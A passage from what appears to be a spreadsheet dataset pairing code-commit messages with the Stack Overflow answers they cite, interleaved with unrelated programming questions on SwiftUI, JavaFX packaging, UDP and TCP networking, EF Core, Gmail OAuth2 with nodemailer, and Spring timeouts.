&lt;p&gt;How can I fix this behavior? I'm guessing there must me a way to offset that space when scrolling to the next page?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Code:&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;import SwiftUI
struct MainTabView: View {
    var body: some View {
        TabView {
            Tab(&amp;quot;Feed&amp;quot;, systemImage: &amp;quot;house&amp;quot;) {
                FeedView()
            }
            Tab(&amp;quot;Friends&amp;quot;, systemImage: &amp;quot;person.2&amp;quot;) {
                Text(&amp;quot;Friends Tab&amp;quot;)
            }
            Tab(&amp;quot;Create&amp;quot;, systemImage: &amp;quot;plus&amp;quot;) {
                Text(&amp;quot;Upload Tab&amp;quot;)
            }
            Tab(&amp;quot;Inbox&amp;quot;, systemImage: &amp;quot;bell&amp;quot;) {
                Text(&amp;quot;Inbox Tab&amp;quot;)
            }
            Tab(&amp;quot;Profile&amp;quot;, systemImage: &amp;quot;person&amp;quot;) {
                Text(&amp;quot;Profile Tab&amp;quot;)
            }
        }
        .tint(.white)
        .onAppear {
            let appearance = UITabBarAppearance()
            appearance.backgroundColor = .black
            // Use this appearance when scrolling behind the TabView:
            UITabBar.appearance().standardAppearance = appearance
            // Use this appearance when scrolled all the way up:
            UITabBar.appearance().scrollEdgeAppearance = appearance
        }
    }
}
#Preview {
    MainTabView()
}
&lt;/code&gt;&lt;/pre&gt;
&lt;pre&gt;&lt;code&gt;import SwiftUI
let colors = [Color.black, Color.blue, Color.green, Color.yellow, Color.red]
struct FeedView: View {
    var body: some View {
        ScrollView {
            LazyVStack(spacing: 0) {
                ForEach(0..&amp;lt;5) { post in
                    Rectangle()
                        .fill(colors[post])
                        .overlay {
                            Text(&amp;quot;Post \(post + 1)&amp;quot;).foregroundStyle(.white)
                        }
                        .containerRelativeFrame(.vertical)
                }
            }
            .scrollTargetLayout()
        }
        .ignoresSafeArea(edges: .top)
        .scrollTargetBehavior(.paging)
        .scrollBounceBehavior(.basedOnSize)
        .scrollIndicators(.never)
        .background(.black)
    }
}
#Preview {
    FeedView()
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I have a &amp;quot;hacky&amp;quot; solution that I'm not sure why it works as this is my first ios app, but I found that adding &lt;code&gt;.padding(.bottom, 1)&lt;/code&gt; to FeedView will fix the offset issue, but it doesn't seem like a very clean solution. With that change, the FeedView will look like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;...
struct FeedView: View {
    var body: some View {
        ScrollView {
            ...
        }
        .padding(.bottom, 1)
        .ignoresSafeArea(edges: .top)
        .scrollTargetBehavior(.paging)
        .scrollBounceBehavior(.basedOnSize)
        .scrollIndicators(.never)
        .background(.black)
    }
}
...
&lt;/code&gt;&lt;/pre&gt;
&lt;h1&gt;Update:&lt;/h1&gt;
&lt;p&gt;One of the proposed approaches is to use &lt;code&gt;.scrollTargetBehavior(.viewAligned(limitBehavior: .always))&lt;/code&gt; instead of &lt;code&gt;.scrollTargetBehavior(.paging)&lt;/code&gt; which for some reason works but only after in interaction, as the first render seems to ignore the bottom safe area even if that is not part of the code.&lt;/p&gt;
&lt;p&gt;First render:&lt;/p&gt;
&lt;p&gt;&lt;a href="https://i.sstatic.net/iliogqj8.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.sstatic.net/iliogqj8.png" alt="first render" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;After interaction, snaps into place:&lt;/p&gt;
&lt;p&gt;&lt;a href="https://i.sstatic.net/J7C1Xm2C.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.sstatic.net/J7C1Xm2C.png" alt="after interaction" /&gt;&lt;/a&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C21</t>
  </si>
  <si>
    <t>Change the entry point of addressbook
After adding the javafx runtime dependency, addressbook is still unable
to run in a JDK11 environment. It gives an error of below:
    Error: JavaFX runtime components are missing, and are required to run this application
This error comes from sun.launcher.LauncherHelper in the java.base
module. The reason for this is that the MainApp extends Application
and has a main method. If that is the case, the LauncherHelper will
check for the javafx.graphics module to be present as a named module.
If that module is not present, the launch is aborted. Hence, having
the JavaFX libraries as jars on the classpath is not allowed in this
case [1].
This is more like a JDK 11 problem which cannot be solved elegantly.
One simple workaround is to have a separate main class that doesn't
extend Application. Hence it doesn't do the check on javafx.graphics
module, and when the required jars are on the classpath, it works fine.
Let's add another main class to be the new entry point of addressbook
to solve this problem [2].
[1] http://mail.openjdk.java.net/pipermail/openjfx-dev/2018-June/021977.html
[2] https://stackoverflow.com/questions/52653836/maven-shade-javafx-runtime-components-are-missing/52654791#52654791</t>
  </si>
  <si>
    <t>UPDATE 10/2021
Since JavaFX 16 a warning is displayed when JavaFX doesn't run on the module path, which is the case of an uber/fat jar:
$ java -jar myFatJar-1.0-SNAPSHOT.jar
Oct 02, 2021 1:45:21 PM com.sun.javafx.application.PlatformImpl startup
WARNING: Unsupported JavaFX configuration: classes were loaded from 'unnamed module @14c24f4c'
Also, you get a warning from the shade plugin itself:
[WARNING] Discovered module-info.class. Shading will break its strong encapsulation.
While these warnings can be initially ignored, there is a reason for them.
As explained in this
CSR
:
JavaFX is built and distributed as a set of named modules, each in its own modular jar file, and the JavaFX runtime expects its classes to be loaded from a set of named javafx.* modules, and does not support loading those modules from the classpath.
And:
when the JavaFX classes are loaded from the classpath, it breaks encapsulation, since we no longer get the benefit of the java module system.
Therefore,
even this widely accepted answer explains how can an uber/fat jar can be created on Maven projects, its use is discouraged, and other modern alternatives to distribute your application, like
jlink
,
jpackage
or
native-image
, should be used; see
Packaging
in the JavaFX tag to
learn more
.
ORIGINAL ANSWER
This
answer
explains why a fat/uber jar fails on JavaFX 11. In short:
This error comes from sun.launcher.LauncherHelper in the java.base module. The reason for this is that the Main app extends Application and has a main method. If that is the case, the LauncherHelper will check for the
javafx.graphics
module to be present as a named module. If that module is not present, the launch is aborted.
And already proposes a fix for Gradle.
For Maven the solution is exactly the same: provide a new main class that doesn't extend from
Application
.
You will have new class in your
application
package (bad name):
// NewMain.java
public class NewMain {
    public static void main(String[] args) {
        Main.main(args);
    }
}
And your existing
Main
class, as is:
//Main.java
public class Main extends Application {
    @Override
    public void start(Stage stage) {
        ...
    }
    public static void main(String[] args) {
        launch(args);
    }
}
Now you need to modify your pom and set your main class for the different plugins:
&lt;mainClass&gt;application.NewMain&lt;/mainClass&gt;
Platform-specific Fat jar
Finally, with the shade plugin you are going to produce a fat jar,
on your machine
.
This means that, so far, your JavaFX dependencies are using a unique classifier. If for instance you are on Windows, Maven will be using internally the
win
classifier. This has the effect of including only the native libraries for Windows.
So you are using:
org.openjfx:javafx-controls:11
org.openjfx:javafx-controls:11:win
org.openjfx:javafx-graphics:11
org.openjfx:javafx-graphics:11:win &lt;-- this contains the native dlls for Windows
org.openjfx:javafx-base:11
org.openjfx:javafx-base:11:win
Now, if you produce the fat jar, you will bundle all those dependencies (and those other regular third party dependencies from your project), and you will be able to run your project as:
java -jar myFatJar-1.0-SNAPSHOT.jar
While this is very nice, if you want to distribute you jar, be aware that this jar is
not
cross-platform, and it will work only on your platform, in this case Windows.
Cross-Platform Fat Jar
There is a solution to generate a cross-platform jar that you can distribute: include the rest of the native libraries of the other platforms.
This can be easily done, as you just need to include the graphics module dependencies for the three platforms:
&lt;dependencies&gt;
    &lt;dependency&gt;
        &lt;groupId&gt;org.openjfx&lt;/groupId&gt;
        &lt;artifactId&gt;javafx-controls&lt;/artifactId&gt;
        &lt;version&gt;11&lt;/version&gt;
    &lt;/dependency&gt;
    &lt;dependency&gt;
        &lt;groupId&gt;org.openjfx&lt;/groupId&gt;
        &lt;artifactId&gt;javafx-graphics &lt;/artifactId&gt;
        &lt;version&gt;11&lt;/version&gt;
        &lt;classifier&gt;win&lt;/classifier&gt;
    &lt;/dependency&gt;
    &lt;dependency&gt;
        &lt;groupId&gt;org.openjfx&lt;/groupId&gt;
        &lt;artifactId&gt;javafx-graphics &lt;/artifactId&gt;
        &lt;version&gt;11&lt;/version&gt;
        &lt;classifier&gt;linux&lt;/classifier&gt;
    &lt;/dependency&gt;
    &lt;dependency&gt;
        &lt;groupId&gt;org.openjfx&lt;/groupId&gt;
        &lt;artifactId&gt;javafx-graphics &lt;/artifactId&gt;
        &lt;version&gt;11&lt;/version&gt;
        &lt;classifier&gt;mac&lt;/classifier&gt;
    &lt;/dependency&gt;
&lt;/dependencies&gt;
Size
There is a main issue with this approach: the size. As you can see in this other
answer
, if you use the  WebView control, you will be bundling around 220 MB due to the WebKit native libraries.
M processor Mac support
The
mac
classifier provides runtime components for older Intel x64-based Macs.  To support newer Mac models containing Apple's M series processors, you also need to include a
mac-aarch64
classified dependency.  M series CPU support for JavaFX is available in a stable version for JavaFX 19+.  When setting the version, all versions of JavaFX components should be the same.  M series support also requires using a JDK version that supports M series Macs (e.g. JDK 17+).
&lt;dependency&gt;
    &lt;groupId&gt;org.openjfx&lt;/groupId&gt;
    &lt;artifactId&gt;javafx-graphics&lt;/artifactId&gt;
    &lt;version&gt;20&lt;/version&gt;
    &lt;classifier&gt;mac-aarch64&lt;/classifier&gt;
&lt;/dependency&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a function which accepts arbitrary iterable objects/containers:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;auto iterate(auto&amp;amp;&amp;amp; iterable);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And it operates on them using range-based for-loops in a generic manner.&lt;/p&gt;
&lt;p&gt;This works fine with standard containers, C-style arrays, and &lt;code&gt;std::generator&lt;/code&gt;, but it fails when I try to pass it an init-list:&lt;/p&gt;
&lt;p&gt;&lt;code&gt;iterate({1, 2, 3});&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;I get the error &lt;code&gt;error: no matching function for call to â€˜iterate(&amp;lt;brace-enclosed initializer list&amp;gt;)&lt;/code&gt; and &lt;code&gt;couldnâ€™t deduce template parameter â€˜auto:57â€™&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;How can I include initalizer lists in the considered candidates for deduction without writing a separate overload? I need it to be only one function because I also want to write iterator-based utilities that operate on multiple iterables, and I don't know how to write functions that would operate on all of them easily if I had to write multiple functions for each combination of ordinary iterable and init-list.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C210</t>
  </si>
  <si>
    <t>Added gradle build file. Changed Netty UDP server to work like descri
bed here: http://stackoverflow.com/questions/37120249/netty-udp-performance-issue</t>
  </si>
  <si>
    <t>You can change your Netty decode() method like so to make it equivalent to the DatagramSocket code:
@Override
protected void decode(ChannelHandlerContext channelHandlerContext, DatagramPacket datagramPacket, List list) throws Exception {
  final Channel channel = channelHandlerContext.channel();
  channel.eventLoop().schedule(() -&gt; {
    final ByteBuf buffer = Unpooled.buffer(64);
    buffer.writeBytes("Hey there".getBytes());
    channel.writeAndFlush(new DatagramPacket(buffer, datagramPacket.sender()));
  }, random.nextInt(sleep), TimeUnit.MILLISECONDS);
}
But I'm guessing the sleep() code is simulating business code you will later execute.
If that is the case make sure you don't run blocking code inside the handler.
EDIT:
To answer your question below:
You got a bit confused with the channels. You create a pipeline in the bootstrap, and you bind to some port. The returned channel is the server channel. The channel in the handlers method (your decode method in your case), is like the socket you get when you
accept()
in traditional socket programming. Note that port you extracted from the incoming DatagramPacket - it's roughly the same. So you send data to the client back on this channel.
The code I wrote that schedules the response is simply doing the same as what your DatagramSocket code, and the threaded netty code you wrote.
I wasn't sure why you did that, and simply assumed you have a business requirement to delay the response.
If this isn't the case, you can remove the schedule call, and your code will run much faster.
If your business logic is non-blocking, and runs in a few millis, you're done. If it's blocking, you need to try to find a non-blocking alternative, or run it in an executor, i.e. not on the event loop.
Hope this helps, even though this wasn't part of your original question. Netty is awesome, and I hate seeing bad examples and bad vibes about it so it's worth my time I guess ;)</t>
  </si>
  <si>
    <t xml:space="preserve">After researching on the topic of claims-Based security (or a federated security model). I've been coming across many examples that use [external-link] as an example. The main article that I read that gave a really great explanation of the subject was a [external-link] by Microsoft on a framework called [external-link]. 
The claims-based security architecture I'm looking into is the equivalent of implementing an [external-link] Authentication Broker in combination with an STS Authorization Broker. This way, when I create a new service all I need to do is ensure that the service will only accept claims issued by the Authorization Broker. And as noted in the article, the Authorization Broker would only accept claims issued by the Authentication Broker. 
When that's setup, any time a client attempts to use the new service, it must authenticate with the Authentication Broker (issuing an authenticated claim) and then get authorized with the
Authorization Broker (issuing an authorized claim).
This is all fine and dandy and the architecture is clear, but I don't see exactly how to implement an STS. As I mentioned, most (if not all) examples around the web are showing how to use CardSpace, but that doesn't exactly work when you have a database backing up your authentication scheme.
Sample Scenario
[external-link]
</t>
  </si>
  <si>
    <t>C211</t>
  </si>
  <si>
    <t>Update serv.py
Had to troubleshoot bind function. Wasn't working when set to 127.0.0.1, getting ERR 111 - CONN refused on all attempts and previous iterations. Beating my head against the wall. 
Finally found https://stackoverflow.com/questions/34725032/python-udp-and-tcp-communication-between-vmware-host-and-guest-not-working . Fixed the damn issue. 
Will continue adding functionality tomorrow now that we have a baseline connection in place</t>
  </si>
  <si>
    <t>server_address = ('127.0.0.1', 10000)
print &gt;&gt;sys.stderr, 'starting up on %s port %s' % server_address
sock.bind(server_address)
you tell the socket to listen on packets addressed to 127.0.0.1:10000 but the incoming packages goes to 192.168.100.37:10000. Try
bind(('0.0.0.0', 10000)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;pre&gt;&lt;code&gt;class RandomMain { static class MyObj{
        public final int i;
        MyObj(int i) { this.i = i;}
    }
    static MyObj m = null;
    public static void main(String[] args) throws Exception {
        m = new MyObj(1);
        final WeakReference&amp;lt;MyObj&amp;gt; a = new WeakReference&amp;lt;&amp;gt;(m);
        final Thread thread = new Thread(() -&amp;gt; {
            int i = 0;
            while(a.get() != null) {
                try {
                    System.out.println(&amp;quot;# (&amp;quot;+ (i++) +&amp;quot;): a.get() != null&amp;quot;);
                    Thread.sleep(1000);
                } catch (InterruptedException e) {
                    throw new RuntimeException(e);
                }
            }
        });
        thread.start();
        new Thread(() -&amp;gt; {
            try {
                Thread.sleep(2500);
                System.out.println(&amp;quot;# Will clear static reference to object (m = null)&amp;quot;);
                m = null;
            } catch (InterruptedException e) {
                throw new RuntimeException(e);
            }
        }).start();
        thread.join();
        System.out.println(&amp;quot;# Thread: yo' about to die, but your sons will seat at the head of all tables, my boy!&amp;quot;);
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;If you run this code, it'll run forever. For me -at least- it does. It doesn't relinquish the reference. As I understand it, the get() method should return null after the static reference has being cleared, right?&lt;/p&gt;
&lt;p&gt;Thanks for reading.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C212</t>
  </si>
  <si>
    <t>first step on the way of TCP/IP communication
for now I added two classes based on https://stackoverflow.com/questions/38162775/really-simple-tcp-client
as today I just added TCP/IP server, I will finish it next week
UDP had more than unacceptable losses due to wifi - wind blow away too much of messages</t>
  </si>
  <si>
    <t>Here is a simple TCP client that uses Sockets that I got working based on code in
this tutorial
(the code for the tutorial can also be found
in this GitHub repository
).
Note that this code is geared to sending strings back and forth between the client and server, usually in JSON format.
Here is the TCP client code:
import android.util.Log;
import java.io.BufferedReader;
import java.io.BufferedWriter;
import java.io.InputStreamReader;
import java.io.OutputStreamWriter;
import java.io.PrintWriter;
import java.net.InetAddress;
import java.net.Socket;
public class TcpClient {
    public static final String TAG = TcpClient.class.getSimpleName();
    public static final String SERVER_IP = "192.168.1.8"; //server IP address
    public static final int SERVER_PORT = 1234;
    // message to send to the server
    private String mServerMessage;
    // sends message received notifications
    private OnMessageReceived mMessageListener = null;
    // while this is true, the server will continue running
    private boolean mRun = false;
    // used to send messages
    private PrintWriter mBufferOut;
    // used to read messages from the server
    private BufferedReader mBufferIn;
    /**
     * Constructor of the class. OnMessagedReceived listens for the messages received from server
     */
    public TcpClient(OnMessageReceived listener) {
        mMessageListener = listener;
    }
    /**
     * Sends the message entered by client to the server
     *
     * @param message text entered by client
     */
    public void sendMessage(final String message) {
        Runnable runnable = new Runnable() {
            @Override
            public void run() {
                if (mBufferOut != null) {
                    Log.d(TAG, "Sending: " + message);
                    mBufferOut.println(message);
                    mBufferOut.flush();
                }
            }
        };
        Thread thread = new Thread(runnable);
        thread.start();
    }
    /**
     * Close the connection and release the members
     */
    public void stopClient() {
        mRun = false;
        if (mBufferOut != null) {
            mBufferOut.flush();
            mBufferOut.close();
        }
        mMessageListener = null;
        mBufferIn = null;
        mBufferOut = null;
        mServerMessage = null;
    }
    public void run() {
        mRun = true;
        try {
            //here you must put your computer's IP address.
            InetAddress serverAddr = InetAddress.getByName(SERVER_IP);
            Log.d("TCP Client", "C: Connecting...");
            //create a socket to make the connection with the server
            Socket socket = new Socket(serverAddr, SERVER_PORT);
            try {
                //sends the message to the server
                mBufferOut = new PrintWriter(new BufferedWriter(new OutputStreamWriter(socket.getOutputStream())), true);
                //receives the message which the server sends back
                mBufferIn = new BufferedReader(new InputStreamReader(socket.getInputStream()));
                //in this while the client listens for the messages sent by the server
                while (mRun) {
                    mServerMessage = mBufferIn.readLine();
                    if (mServerMessage != null &amp;&amp; mMessageListener != null) {
                        //call the method messageReceived from MyActivity class
                        mMessageListener.messageReceived(mServerMessage);
                    }
                }
                Log.d("RESPONSE FROM SERVER", "S: Received Message: '" + mServerMessage + "'");
            } catch (Exception e) {
                Log.e("TCP", "S: Error", e);
            } finally {
                //the socket must be closed. It is not possible to reconnect to this socket
                // after it is closed, which means a new socket instance has to be created.
                socket.close();
            }
        } catch (Exception e) {
            Log.e("TCP", "C: Error", e);
        }
    }
    //Declare the interface. The method messageReceived(String message) will must be implemented in the Activity
    //class at on AsyncTask doInBackground
    public interface OnMessageReceived {
        public void messageReceived(String message);
    }
}
Then, declare a TcpClient as a member variable in your Activity:
public class MainActivity extends Activity {
    TcpClient mTcpClient;
    //............
Then, use an AsyncTask for connecting to your server and receiving responses on the UI thread (Note that messages received from the server are handled in the
onProgressUpdate()
method override in the AsyncTask):
public class ConnectTask extends AsyncTask&lt;String, String, TcpClient&gt; {
    @Override
    protected TcpClient doInBackground(String... message) {
        //we create a TCPClient object
        mTcpClient = new TcpClient(new TcpClient.OnMessageReceived() {
            @Override
            //here the messageReceived method is implemented
            public void messageReceived(String message) {
                //this method calls the onProgressUpdate
                publishProgress(message);
            }
        });
        mTcpClient.run();
        return null;
    }
    @Override
    protected void onProgressUpdate(String... values) {
        super.onProgressUpdate(values);
        //response received from server
        Log.d("test", "response " + values[0]);
        //process server response here....
}
To start the connection to your server, execute the AsyncTask:
new ConnectTask().execute("");
Then, sending a message to the server:
//sends the message to the server
if (mTcpClient != null) {
    mTcpClient.sendMessage("testing");
}
You can close the connection to the server at any time:
if (mTcpClient != null) {
    mTcpClient.stopClient();
}</t>
  </si>
  <si>
    <t xml:space="preserve">Derik Whitaker posted an [external-link] a couple of days ago that hit a point that I've been curious about for some time: should business logic exist in controllers?
So far all the ASP.NET MVC demos I've seen put repository access and business logic in the controller.  Some even throw validation in there as well.  This results in fairly large, bloated controllers.  Is this really the way to use the MVC framework?  It seems that this is just going to end up with a lot of duplicated code and logic spread out across different controllers.
</t>
  </si>
  <si>
    <t>C213</t>
  </si>
  <si>
    <t>Bugfix for LAN autofind servers. Needed to change the way we broadcas
t UDP so that we do it individually for each NIC's broadcast address. (see: http://stackoverflow.com/questions/683624/udp-broadcast-on-all-interfaces)</t>
  </si>
  <si>
    <t>First of all, you should consider broadcast obsolete, specially
INADDR_BROADCAST
(255.255.255.255). Your question highlights exactly one of the reasons that broadcast is unsuitable. It should die along with IPv4 (hopefully). Note that IPv6 doesn't even have a concept of broadcast (multicast is used, instead).
INADDR_BROADCAST
is limited to the local link. Nowadays, it's only visible use is for DHCP auto-configuration, since at such time, the client will not know yet in what network it is connected to.
With a single
sendto()
, only a single packet is generated, and the outgoing interface is determined by the operating system's routing table (
ip route
on linux). You can't have a single
sendto()
generate more than one packet, you would have to iterate over all interfaces, and either use raw sockets or bind the socket to a device using
setsockopt(..., SOL_SOCKET, SO_BINDTODEVICE, "ethX")
to send each packet bypassing the OS routing table (this requires root privileges). Not a good solution.
Instead, since
INADDR_BROADCAST
is not routed anyway, you can achieve almost the same thing by iterating over each interface, and sending the packet to its broadcast address. For example, assuming that your networks have 255.255.255.0 (/24) masks, the broadcast addresses are
192.168.1.255
and
192.168.2.255
. Call
sendto()
once for each of these addresses and you will have accomplished your goal.
Edit:
fixed information regarding to
INADDR_BROADCAST
, and complementing the answer with information about
SO_BINDTODEVICE
.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When having to forego EF Core and do some ADO.net operations against the database, how do you safely use the EF Core managed connection? For example, I need to execute a reader. Currently this is what I do:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var cmd = DataContext.Database.GetDbConnection().CreateCommand();
cmd.CommandText = sqlToUse;
cmd.CommandType = CommandType.Text;
using (cmd)
{
    if (cmd.Connection.State == ConnectionState.Closed)
        cmd.Connection.Open();
    if (DataContext.Database.CurrentTransaction != null)
        cmd.Transaction = DataContext.Database.CurrentTransaction.GetDbTransaction();
    using (var reader = cmd.ExecuteReader())
    {
        while (reader.Read())
        {
            // Do the things
        }
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is there anything that I need to do with the connection afterwards whether or not I've opened the connection?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C214</t>
  </si>
  <si>
    <t>Created a server and client
These two files are working at my home-subnet. I used (almost..) the
same procedure as the one in the following post:
http://stackoverflow.com/questions/20730891/udp-server-client-in-go-not-reading-data.
It needs to be testet at the lab-PC at Sanntidslaben.</t>
  </si>
  <si>
    <t>The UDPConn.ReadFromUDP method reads data and puts it into the slice you provided. In your case this slice is nil. Therefore your buffer does not provide enough space for data. You can fix this by changing one line in the server code:
var buf []byte = make([]byte, 1500)
The buffer size should probably be chosen to fit your network protocol. Or you create a 64k buffer so that you can receive maximum sized udp packets. This however seems a bit wastefull :)</t>
  </si>
  <si>
    <t xml:space="preserve">I am looking for a more sophisticated way of using Linq to SQL. I am leaning L2Q but I am only seeing simple examples of business objects and simple CRUD operations in them.
Any sample application that includes these:
1- Business objects which get their data from more than 1 table and from many to many tables.
2- Keeping track of  data changes and automatically be able to  make changes to more than one table in a simple operation. An intelligent SubmitChanges? (don't know if this possible - right now I write my own stored procs to do all the work plus I am desiging my database in a way so my use of Linq to SQL is easier!)
3- Good use of relationships between tables. It should be more than just dragging tables into the designer.
4- Transactions
5- disconnected data. Use in ASP.NET.
6- N-Tier architecture
7- Basically, more sophisticated use of LINQ to SQL and learning good design patterns
8- Skip Linq to SQL and move to Linq to Entities?
I feel I am not taking good advantage of Linq and it's just giving me nice intellisense and easier queries and I feel it has a lot more to offer but not sure what and how.
I am looking for real life sophisticated samples which can be a good source for learning above from what books and tutorials provide.
Anything on CodePlex? Google code... etc?
</t>
  </si>
  <si>
    <t>C215</t>
  </si>
  <si>
    <t>Refactor: Apply OAuth2 Gmail sender
- Create project at GCP
- Apply Gmail API
- Create OAuth2 credentials in Gmail API
- Connect the credentials with Google OAuth2.0 Playground
- Add OAuth2 credentials &amp; refresh token to .env
- Bring added credentials &amp; refresh token &amp; configure nodemailer transporter
- Reference:
https://stackoverflow.com/questions/24098461/nodemailer-gmail-what-exactly-is-a-refresh-token-and-how-do-i-get-one/24123550</t>
  </si>
  <si>
    <t xml:space="preserve">Notes by this answer original's author:
So, I finally managed to figure it out. I'm surprised I couldn't find more ressources about that so for those who need to use Gmail with Nodemailer
I found the answer here: http://masashi-k.blogspot.fr/2013/06/sending-mail-with-gmail-using-xoauth2.html
Try creating a new User if you already had one and things ain't working fine. It was the case for me.
I hope this will be useful to someone,
Cheers
Question 1: What exactly is a refresh token?
From documentation found here:
A refresh token provides your app continuous access to Google APIs while the user is not logged into your application.
(...)
Considerations:
Be sure to store the refresh token safely and permanently, because you can only obtain a refresh token the first time that you perform the code exchange flow.
There are limits on the number of refresh token that are issued—one limit per client/user combination, and another per user across all clients. If your application requests too many refresh tokens, it may run into these limits, in which case older refresh tokens stop working.
See also Offline Access and Using a refresh token.
Question 2: How do I get one?
Step 1: Obtain OAuth 2.0 credentials at Google Developers Console
As stated here, you should:
Go to the Google Developers Console.
Select a project, or create a new one.
In the sidebar on the left, expand APIs &amp; auth. Next, click APIs. Select the Enabled APIs link in the API section to see a list of all your enabled APIs. Make sure that the "Gmail API" is on the list of enabled APIs. If you have not enabled it, select the Gmail API from the list of APIs (under Google Apps APIs), then select the Enable API button for the API.
In the sidebar on the left, select Credentials.
If you haven't done so already, create your project's OAuth 2.0 credentials by clicking Create new Client ID, and providing the information needed to create the credentials.
Look for the Client ID and Client secret in the table associated with each of your credentials.
PAY SPECIAL ATTENTION TO specifying https://developers.google.com/oauthplayground as a Redirect URI when you create a new User in the console. Otherwise, you will have an error.
Step 2: Obtain the refresh token at Google OAuth2.0 Playground
Go to the Google Oauth2.0 Playground.
Click the Gear Button on the right-top. Set your Client ID and Client Secret obtained from the Google Developers Console, and select Access token location as Authorization header w/ Bearer prefix. Close this configuration overlay.
Set up the scopes. Use https://mail.google.com/ as it's the one need by nodemailer. Then click the Authorize APIs button.
After OAuth2.0 authorization, exchange authorization code for tokens and voilá! your refresh token is ready-to-use
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an app on API 34 that runs MockWebServer for the tests.
Mockweberser is triggered only for tests that are mocked.
Mockweberser class inits on port 8080&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class MockedkWebServer {
...
 init {
  val mockServer = MockWebServer()
   mockServer.start(8080)
   ...
 }
 ...
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I am using &lt;code&gt;5.0.0-alpha.12&lt;/code&gt; dependency version for MockWebServer. Changing port to any other not changing the situation.
It's all working fine for API 34.&lt;/p&gt;
&lt;p&gt;When running mocked tests against API 35 device it fails for those tests.
MockWebServer on test start fails the test after the 1s and threw an error :&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;java.net.UnknownHostException: Unable to resolve host &amp;quot;localhost&amp;quot;; No address associated with hostname.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Stacktrace pinpoint to &lt;code&gt;mockServer.start(8080)&lt;/code&gt; invocation.&lt;/p&gt;
&lt;p&gt;I have dug a little, and found that after adding some ip's to the local network config.xml file, tests start to work, but may fail at the start, so this is not the solution I need :&lt;/p&gt;
&lt;pre&gt;&lt;code&gt; &amp;lt;domain-config cleartextTrafficPermitted=&amp;quot;true&amp;quot;&amp;gt;
    &amp;lt;domain includeSubdomains=&amp;quot;true&amp;quot;&amp;gt;localhost&amp;lt;/domain&amp;gt;
    &amp;lt;domain includeSubdomains=&amp;quot;false&amp;quot;&amp;gt;10.0.2.2&amp;lt;/domain&amp;gt;
    &amp;lt;domain includeSubdomains=&amp;quot;false&amp;quot;&amp;gt;10.0.2.3&amp;lt;/domain&amp;gt; // added
    &amp;lt;domain includeSubdomains=&amp;quot;false&amp;quot;&amp;gt;10.0.3.2&amp;lt;/domain&amp;gt;
    &amp;lt;domain includeSubdomains=&amp;quot;true&amp;quot;&amp;gt;10.0.2.15&amp;lt;/domain&amp;gt; // added 
    &amp;lt;domain includeSubdomains=&amp;quot;true&amp;quot;&amp;gt;10.0.2.16&amp;lt;/domain&amp;gt;// added
  &amp;lt;/domain-config&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Question is - what can cause such behavior ? What ways to fix it.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C216</t>
  </si>
  <si>
    <t>Make Class and DatasetController @RestController to honor spring.mvc.
async.request-timeout
https://stackoverflow.com/questions/61030650/spring-rest-endpoint-returning-streamingresponsebody-asyncrequesttimeoutexcepti</t>
  </si>
  <si>
    <t>To fix the problem:
Change @RepositoryRestController to e.g., @RestController.
If you use @RepositoryRestController, the timeout will be set for the RequestMappingHandlerAdapter. But upon requesting the download, the RepositoryRestHandlerAdapter handles the request, as the annotation requires him to.
If you use the @RestController then the (correct) RequestMappingHandlerAdapter will handle the download, with the timeout set to -1.
The original answer:
You could try to declarative/explicit define the timeout, by returning a org.springframework.web.context.request.async.WebAsyncTask&lt;V&gt;.
If offers to set a Callable&lt;V&gt; with a timeout:
Then your DefaultController could look like:
public WebAsyncTask&lt;ResponseEntity&lt;StreamingResponseBody&gt;&gt; downloadHub() throws IOException {
  ...
  new WebAsyncTask&lt;ResponseEntity&lt;StreamingResponseBody&gt;&gt;(myTimeOutAsLong, callable);
}
Update:
Please remove the HttpServletResponse parameter from your REST controller method. Just to be sure, that the OutputStream from the HttpServletResponse does not interfere with the OutputStream from StreamingResponseBody.
Regarding the error ´Cannot dispatch without an AsyncContext´: https://stackoverflow.com/questions/52255773/cannot-dispatch-without-an-asynccontext-when-serving-files</t>
  </si>
  <si>
    <t xml:space="preserve">I won the bid on a project and now the client (who is itself from IT Department) wants me to architect/implement the solution in a very particular way. I am sure the application will fail that way for performance problems. And it will not be easily scalable.
This particular client/user does not know ANYTHING about the platform and language I will be using (ASP.NET / SQL Server). His only knowledge is in Cobol and trying to make him to understand my POV is just making him angry.
He contacted me. He was the person who selected me as a winner on the bid. He is who will be approving my checks. He is my only contact with this company.
I do not feel comfortable with providing a solution I know will fail and I do not want to be known as the stupid programmer who make it fail. I do know their real needs and usage patterns for this application because I have done projects for them in the past.
On the other hand, doing this in his way will just extend my contract more time (so, more financial gains) in order to solve the problems by modifying the code.
Should I resign from the project knowing that probably I will be losing this client forever? 
Orâ€¦
Should I take the pill and take financial advantage from an extended project and just assume the bad fame as a cost?
</t>
  </si>
  <si>
    <t>C217</t>
  </si>
  <si>
    <t>major architecture refactoring across EJB and JSF backing beans
